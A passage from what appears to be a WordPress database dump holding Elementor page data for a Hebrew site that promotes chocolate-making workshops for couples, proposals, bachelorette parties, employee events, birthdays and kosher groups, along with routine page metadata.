\\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h3><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea. <br \\/><br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><p>\\u00a0<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h3><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h3><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd. <br \\/><br \\/>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2230,425,'_elementor_edit_mode','builder'),(2231,425,'_elementor_template_type','wp-page'),(2232,425,'_elementor_version','2.7.5'),(2233,425,'_elementor_pro_version','2.7.3'),(2234,425,'_wp_page_template','elementor_header_footer'),(2235,425,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2236,425,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b21e8f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d18fa46\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2529b3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05d9\\u05d6\\u05d4 \\u05d8\\u05d9\\u05e4\\u05d5\\u05e1\\u05d9\\u05dd \\u05d0\\u05ea\\u05dd? \\u05de\\u05e8\\u05d9\\u05e8, \\u05d7\\u05dc\\u05d1 \\u05d0\\u05d5 \\u05dc\\u05d1\\u05df? \\u05db\\u05df \\u05d4\\u05db\\u05d5\\u05d5\\u05e0\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 